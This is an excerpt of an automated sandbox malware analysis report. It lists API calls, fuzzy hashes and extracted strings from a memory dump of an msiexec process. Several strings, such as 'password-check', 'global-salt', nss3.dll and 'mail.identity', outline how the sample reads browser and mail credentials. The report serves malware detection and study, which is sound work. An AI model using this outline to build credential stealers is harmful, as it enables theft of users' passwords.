                                                                                            • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                            • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                            • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                            • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                            APIs
                                                                                            • wcslen.MSVCRT ref: 0044406C
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                            • strlen.MSVCRT ref: 004440D1
                                                                                              • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                              • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                            • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 577244452-0
                                                                                            • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                            • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                            • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                            • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040C02D
                                                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                              • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                              • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                              • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                            • API String ID: 2726666094-3614832568
                                                                                            • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                            • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                            • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                            • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                            APIs
                                                                                            • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                              • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                            • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                            • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                            • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp$memcpy
                                                                                            • String ID: global-salt$password-check
                                                                                            • API String ID: 231171946-3927197501
                                                                                            • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                            • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                            • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                            • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                            APIs
                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                            • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                            • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                            • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1189762176-0
                                                                                            • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                            • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                            • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                            • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                            APIs
                                                                                            • GetParent.USER32(?), ref: 004090C2
                                                                                            • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                            • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                                            • String ID:
                                                                                            • API String ID: 4247780290-0
                                                                                            • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                            • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                            • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                            • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                            APIs
                                                                                            • _strcmpi.MSVCRT ref: 0040E134
                                                                                            • _strcmpi.MSVCRT ref: 0040E14D
                                                                                            • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strcmpi$_mbscpy
                                                                                            • String ID: smtp
                                                                                            • API String ID: 2625860049-60245459
                                                                                            • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                            • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                            • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                            • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                            APIs
                                                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                            • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                            • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                            • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                            • String ID: MS Sans Serif
                                                                                            • API String ID: 3492281209-168460110
                                                                                            • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                            • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                            • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                            • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassName_strcmpimemset
                                                                                            • String ID: edit
                                                                                            • API String ID: 275601554-2167791130
                                                                                            • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                            • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                            • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                            • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strcmpi
                                                                                            • String ID: C@$mail.identity
                                                                                            • API String ID: 1439213657-721921413
                                                                                            • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                            • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                            • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                            • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                            APIs
                                                                                            • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                            • sprintf.MSVCRT ref: 0040909B
                                                                                              • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                              • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                              • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                              • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                              • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                            • String ID: menu_%d
                                                                                            • API String ID: 1129539653-2417748251
                                                                                            • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                            • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                            • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                            • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                            APIs
                                                                                            • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                            • _mbscat.MSVCRT ref: 004070FA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscat$_mbscpystrlen
                                                                                            • String ID: sqlite3.dll
                                                                                            • API String ID: 1983510840-1155512374
                                                                                            • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                            • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                            • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                            • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 3510742995-0
                                                                                            • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                            • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                            • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                            • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8